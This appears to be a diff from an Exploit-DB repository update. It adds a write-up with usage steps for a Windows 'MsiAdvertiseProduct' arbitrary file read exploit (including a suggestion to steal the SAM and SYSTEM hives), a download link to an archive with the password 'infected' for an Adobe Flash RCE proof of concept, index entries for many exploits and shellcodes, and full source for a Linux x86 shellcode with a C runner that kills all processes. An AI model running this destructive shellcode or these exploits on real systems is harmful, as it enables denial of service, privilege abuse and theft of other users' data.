@ -0,0 +1,23 @@
The bug is in “MsiAdvertiseProduct”
Calling this function will result in a file copy by the installer service.
This will copy an arbitrary file that we can control with the first parameter into c:\windows\installer … a check gets done while impersonating, but using junctions there is still a TOCTOU .. meaning we can get it to copy any file as SYSTEM, and the destination file will always be readable. This results an in arbitrary file read vulnerability.
To reproduce:
Make sure to copy both readfile.exe and “file” (found under folder PoC-Files)… and put them in the same directory.
Usage: readfile.exe targetfile (where targetfile is the file to read, IE: “readfile.exe c:\users\test\desktop\desktop.ini”)
Run on 2 cores or more, this should work on one core with some modifications.. since you should be able to hit the timing with oplocks too (but I'm lazy).. you should be able to see something like this if it works: https://www.youtube.com/watch?v=x4P2H64GI1o
The easiest way to confirm the bug is to make two local accounts and read the desktop.ini of the other account.
Even without an enumeration vector, this is still bad news, because a lot of document software, like office, will actually keep files in static locations that contain the full path and filesnames of recently opened documents.. thus by reading files like this, you can get filenames of documents created by other users.. the filesystem is a spiderweb and references to user created files can be found everywhere.. so not having an enumeration bug is not that big of a deal.
If shadow copies are enabled you can obviously steal the SAM and SYSTEM hive I assume...
Maybe there's some other use-cases.. but I'm not very smart, so I don't know.
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46040.rar

2
exploits/windows/local/46051.txt Normal file
View file

@ -0,0 +1,2 @@
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46051.zip
Password: infected

13
files_exploits.csv
View file

@ -6224,6 +6224,8 @@ id,file,description,date,author,type,platform,port
46022,exploits/windows/dos/46022.txt,"VBScript - VbsErase Reference Leak Use-After-Free",2018-12-20,"Google Security Research",dos,windows,
46023,exploits/windows/dos/46023.txt,"VBScript - MSXML Execution Policy Bypass",2018-12-20,"Google Security Research",dos,windows,
46030,exploits/windows/dos/46030.py,"SQLScan 1.0 - Denial of Service (PoC)",2018-12-21,"Rafael Pedrero",dos,windows,
46038,exploits/linux/dos/46038.py,"Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)",2018-12-24,Sam,dos,linux,
46042,exploits/multiple/dos/46042.html,"Google Chrome 70 - SQLite Magellan Crash (PoC)",2018-12-15,zhuowei,dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10167,6 +10169,9 @@ id,file,description,date,author,type,platform,port
46021,exploits/windows/local/46021.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)",2018-12-20,bzyo,local,windows,
46025,exploits/windows/local/46025.py,"AnyBurn 4.3 - Local Buffer Overflow (SEH)",2018-12-21,"Matteo Malvica",local,windows,
46028,exploits/windows/local/46028.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Read",2018-12-21,evil_polar_bear,local,windows,
46040,exploits/windows/local/46040.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read",2018-12-20,SandboxEscaper,local,windows,
46044,exploits/linux/local/46044.md,"Keybase keybase-redirector - '$PATH' Local Privilege Escalation",2018-10-22,mirchr,local,linux,
46051,exploits/windows/local/46051.txt,"Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC)",2018-12-24,smgorelik,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17029,6 +17034,9 @@ id,file,description,date,author,type,platform,port
45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
46034,exploits/multiple/remote/46034.py,"Netatalk < 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple,
46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple,
46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40524,3 +40532,8 @@ id,file,description,date,author,type,platform,port
46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80
46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443
46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php,
46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php,
46036,exploits/php/webapps/46036.txt,"WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)",2018-12-24,linfeng,webapps,php,
46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php,
46041,exploits/php/webapps/46041.py,"phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read",2018-12-15,VulnSpy,webapps,php,
46050,exploits/php/webapps/46050.txt,"PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)",2018-11-30,"Alex Leahu",webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -927,3 +927,4 @@ id,file,description,date,author,type,platform
45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64
45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64
46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux

1 id file description date author type platform
927 45943 shellcodes/linux_x86-64/45943.c Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes) 2018-12-04 Kağan Çapar shellcode linux_x86-64
928 45980 shellcodes/linux_x86/45980.c Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes) 2018-12-11 T3jv1l shellcode linux_x86
929 46007 shellcodes/linux_x86-64/46007.c Linux/x64 - Disable ASLR Security Shellcode (93 Bytes) 2018-12-19 Kağan Çapar shellcode linux_x86-64
930 46039 shellcodes/linux/46039.c Linux/x86 - Kill All Processes Shellcode (14 bytes) 2018-12-24 strider shellcode linux

42
shellcodes/linux/46039.c Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Linux/x86 - Kill All Processes Shellcode (14 bytes)
# Google Dork: None
# Date: 2018-12-08
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 14
# Description: Linux/x86 kill 9 -1 (14 bytes)
------------------------------[Description]---------------------------------
This shellcode will kill all processes
-----------------------------[Shellcode Dump]---------------------------------
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: b0 25 mov $0x25,%al
8048065: bb ff ff ff ff mov $0xffffffff,%ebx
804806a: b1 09 mov $0x9,%cl
804806c: cd 80 int $0x80
-----------------------------[Compile]---------------------------------------------
gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
-----------------------------[C-Code]-----------------------------
#include<stdio.h>
#include<string.h>
unsigned char code[] = "\x31\xc0\x50\xb0\x25\xbb\xff\xff\xff\xff\xb1\x09\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}